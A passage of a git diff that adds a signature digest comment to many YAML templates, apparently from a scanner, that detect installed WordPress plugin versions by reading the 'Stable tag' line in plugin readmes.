--git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..61527c8e76 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202cb66758deb64b2ede6bff23cf88d9f0c35319de304b837caad681ebbb6e422c02203a90bce0058ff1e1b3dd98a34349103544aba1471ad27491551baca0efbb37d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..f5520a724c 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e172924349a58e8099d5cba294b8f25464d48222b20e9c8e3dc7d79a12d07f1f0221009b5b0c79f33b5e0a2e76129201b6f6a6c93af6677d3863843d31735b30f3569a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..9d768bc536 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201443cdf018a54464809f56c85f392e127dfc783f0060569bf48b53cf1f0956210221008575c118382f876c5aec6d19f967b15c1b7ce1e334c05a598f08c2940aee58d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..5f037676d6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049d0b26602ea09cd9d36b3b1052dc210098096227efdbb753e740e1e42b7c8a802203137509eb0378a7ef21533e118fb802b941b627ef45b1408f048086b9d58afb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 67968fb008..f2a3555f71 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210091b13a092f8fe9ff24af8651dbdc6b5835639b94ec77b264a37cef159be20894022100d5ee8dd339f3ecda0c0b95191e6ca26f215062eb57d66f297ab6f56c038bd8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..0e89b1e186 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220750c73ba0e1030dc5b947332f7832701824d198cebe2d3fe59d28071877cb34b0220589734cfd0178acd91cf84f477617477c29c1394e5c51264fb0a44ad3694be5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..fe0b4bfb1c 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008514deb19b498fb61e2ed79d967821bb80535e4c07c1771adcb2d414dcc1b19e022037e95cdb933f9140e3bae8a73fa1a69d79db3412208ae0c23e26f15d3c5fd7d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..bed37ab7b2 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202eceb63dbd039e93074f51620420f43f83e9b9dfdde68b1ecb34f64feae105bc0221009f29fb2e2c0694dfc4ea4923fd29d238c7af4e3d5f6e7bb0a7dff311b71f23c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index d22f60a5cd..a60e0fad48 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004dd9da94e73e59095555824c4d46f567513c49de4f0201673cae81cb72df8a50220016930fbb8d0f9afbc417ca7079de73932ab1b75b9e586ce35c34a946cf346b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..f734426e0d 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a33e307f8707be2fdf0039641ffcb8ebe5034089833cc7217d5187185f9a545a022100b1e60d29347ebd1018ec1de7b1b69badf783c3be6fc97b60711eba087ff96334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 2d4f463d97..3f9ad2d0ca 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc66528bfb1fe5975dbaa4a8d21f877df4fe371bcc7b0cb71bf45e011cbba633022044eb9953f3058e48aafa160694b52fe1627c158d7fc833e6abd31807584876fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index cb67671918..5df37f5ad4 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f727b6750cae69c710e0a2f3e99ecc4948fbeeed4cdb85b011d409c515830184022100949fd402e1056689b15acb7dceafe2036aa56aa66a01299b33128c3177481b78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cc3eb2481a..b3b0c83a05 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7df9b956824ae8b8f5bc36c3bce379654529330f1b3238186136f5868ec20a4022015dda23588b198f9ee78c1e2787df703a90210a8152f9809d01bbc8a0ba965ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..f580bd14f5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc0b48aa600660ed42678c3245781bf28734098554327d07d00c4c9916c3cf400221009dcf148e1460cc34f8ba9f43777d1b1dfe64569dad4e69ca5526c989e46dca59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..53c7431a51 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dfc768d413f1d8efd62d6e507af2073d6d7f6b38c4f41ebae68585c6ca9adc13022100b00f2addecbd7d13771dc5de1b1bd97a5ee4cb4f02195283379409babefa099d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..6ce4bbb2e8 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204312e039ca66dc0ba21283dc41b5feea09c84f07ee5886928528faa34a8622b402201065cb7de0799e9132d964eec3b0920f7ba410c7300bb4fd1e282335cfd3c7ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index a33aa7964f..ce5fe072ff 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205936ae9ccf14ae5d326cc9ad6330cf5a9b28de9af023e3dc9d1ec1e3804e5bee022100806e03d59608dfa1249f04e30fc1782ac5792bdb192343d82b292e2e36140f24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..1768c1a277 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e20299679fba8b05b9c0c9d7bc2cc2ac0a5ee33e6908e9c5a04718b8823e2ad02210084ea7941ba8f2ca37a3209694541109e12dccb29047bafb5f684ddda3fecbad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..5827da6639 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024e021fcf40cd61369148bcc9800dbd0042f9054651cd0b7b28d5e1a0c4d49ab0220337a763758279d1895837faa829a9ff4939096f6ef2a840aa8f0c66447e90444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..21250f5787 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab35ac0ba307b659c7f2dbe83648cb151d4a1c19d39ac89f9bf4ffdb28b15dcb0220437480d3f509f214d3f5f1d6d5c897cc08ec48e1b0a38cb3b050db043fd7a57b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 69c367b8d5..e7148e372b 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073cd071cc90245e30ac9cb6b567e717cd8cebd8c756cb3e7fb7e15e5f1979e23022078ae86d086fdc656ca60760c02665f2e556c2c9caa9b68b0013050bdcef67800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 7776b209df..79a10806e5 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220348556cc4640e1f8d83d200d41d22e544c8db9323c10a5fb9fefd041d539dfc302203df8bcce991379ab98156e7f63098f9fa5c4a2f3bf6d2b4063a61371d27de1e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..cf64db58ad 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082162fcc5b2b4c22317dc60d9b830840815c47b0e115003ce89eef40a1b5602a0220455d111b4bd4d49b9e706e2b49f0552d96314b0c1b97cbefbea9aa4d1d8ef8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..2618090f1f 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220319715520813739559e51a9ccaa0d8933be6d74881c195a80867e2c00445238c022100e54550edc212147121352749c5d7074ab1e7f74908dbbf8db3e38761afd4d358:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..02778caa78 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220234e0dd65bec536a6f4fb68a6b125840ca04a21d53c727148488f86a9a0bfde602201a35ce8851e577516f29f785f2a1eb773044e8484d1e830dc717b19b96a6378c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..c8e6561e60 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220193a8a7a1f40b26b40b46b789a88b53c27d2249f9d73da2535281e181114542e022100d4eed3410197421ee02f7f19e3dfb04a283f9fa935be7f45bcb70d312b785f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..5970eb0c72 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100feaf89a8dd07f687b4df5b0123ef07fdebe6354eee3ae21e6a2a94fda3ca6ce202202030055b8aa0819d3b7a7433f6d7b0c26aa17ea852f4996f819665d4225ceff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..93006c2f9d 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204777ba0a7f6496837a82483e77fbc90c20ba821bc47c3185d9f23b485fd6380202203ca92b798a14dcc8753f22cf28af73630e1c9860132217c34e5d31b00886a944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 9d77ce9155..5d8eaf2bfd 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e916f5fa00d5c7b045285af6745f0a1e2645b07e7f6a660409141323bbba3727022100e5cdf145956e558b12292f6e6c265f437d35e8aa0528a69d98cf793d160419ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..c9c4caaee3 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e05a16bda3acbe2700362ce5034b1b38bdd09e231e49ce3d20d90ea5cd0775f5022100f7a185c3ebcbf323c1c84c0add51781a6e31a10a9d8c2e57cf2a7fe99b730dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..efd45b6b95 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d5a8a334c73f4533d1a00f6afd1c0bfce744cc6fe64ca2f0de974c3856c6f4602210097d56671faf1d2ce2297cf3766d6217a4d91d0509172b4cff349c6972287f967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..f64e06a7ce 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b54354a774acda187b576aa9e07189a99859026d356b0b825fa9c571ae4eb2a022100c0efcadb06b10b2e5fa7f5be57bb6bd753543b86e4209d98090b51610cccc858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 34d36d4349..36e503afae 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100927471834fad2afd1cb51c090bca44fc1bf37599d9ecab3c1de23a2f6fccafcd022100eb5026aee717465309369ce978ded6d7b4f0737c2b26acf80d18b36a7a2fee20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..a8cc6eb298 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210099058967b5f8b2d66a12f47bc724eb182e29b743cce3e801ffe7b748183b363b022100a9fc572394d70033432508aded94be4cb33abd4227e161257bc3c6909c3e8491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 39b176dcb8..bbc85f1345 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028b9a38ea8521cd401f1e5c37256d7716417c7fa734bfbd02648adb7462e9efb022100db7de5222c54af8d8b04142580c10126a96f27804d0dc4469f0060d8ca088a3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..cf63c64c49 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200993a2f9293b15404037136ff8e65cde3ad870a050a03bd5d966cc0fc58c67b7022100e5ee1514cdcfeda9e202526d424a87f6ceb330f9340ced03f2ec2e0488681b0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..34e8bad8fe 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203cab09772ed42c607ed0d8bf7ebf8f71356cebbc8bc57a781f9e01f8ffb17c1a02202ff296830682608221822a4c556dd75d47903fdd707f633422f63a110886b972:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..028112bb4e 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100feffe35f18eef259556f87acbd1efbd062c20b46114c3d7ea96b50e58173ce3b02201ab713ac92a4662e8ff57ae1f4ba3d7486f38cd82054dc5dbfc2927d844354ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..4e52cc28f1 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d6fd87987412374ac4b21c89ba29ddc1552863b7d5939368ef8bc57a3f77a3fe022100ed0a03dcc643174dbd890cca7a49c963822db666e48da2b1dfd31bbfd3933dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..f2a96eed96 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a32848dc7515ec675cf69580a79eed387b18458272d34ea1bc6b7fd2a305b73b0220567783f988c4c75351fdfa04267eddb19b997be024371ce7c039bcdb5efc6b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..dec6a4be85 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079f38cfb5d5d55252e7e99d1b6ee84ce76dc9ac2dc14ebabedbf127eaffbe8bc022100afe4a6c6253444c08e3f2848b1e58985fb531c7568223b22c083d0d3ead8fe5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..97aaa23773 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd3c7d28976237f9853502b43cff74787673f9cc2c9572ac7445810e8a5fb6a1022100b4c3ec73cb0a2b9edfe3e8d30fc2c93e507cedb01823b7e455cabfecdc94b391:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..b4f28b2f10 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ab20299c4ccb6c2d7229e1dbf3de5fd034c3445d15e4422551ab2d1c351480202200db582532d018cd6fd9fbf31e06d53bacf78be1c0e32bb10ce74bb4ce9d30216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..2da434f498 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220443a444fe04123028a6e2c046d1625ddf3828f09087111a34f80be65a486717402204c48c9d73613c31a3f12689df0fcd30054915a880ac0e900b0a6bf45f1e67ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a4c9f2c7c4..6c5f1556ea 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a80c49a0fad0e1ac287eef673dbacfade5ee5b96a6d1f6ebd3394f0be62d6cc0221008dea2e1992236a95f0d69f4f3a64f63d362f93f33b2afbcad1f6a3f089dfc04d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1fd49d2e08..d65b23eb44 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f327ebb92c6fa02c20264e9fd17e58ed28eb5d5a039f371c0af5a2dead0fdbd502210093d31bc82a839316dbb7ca2d39243dd9f5888f6628d77154d024072e136f7ab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..aa16b2241f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ 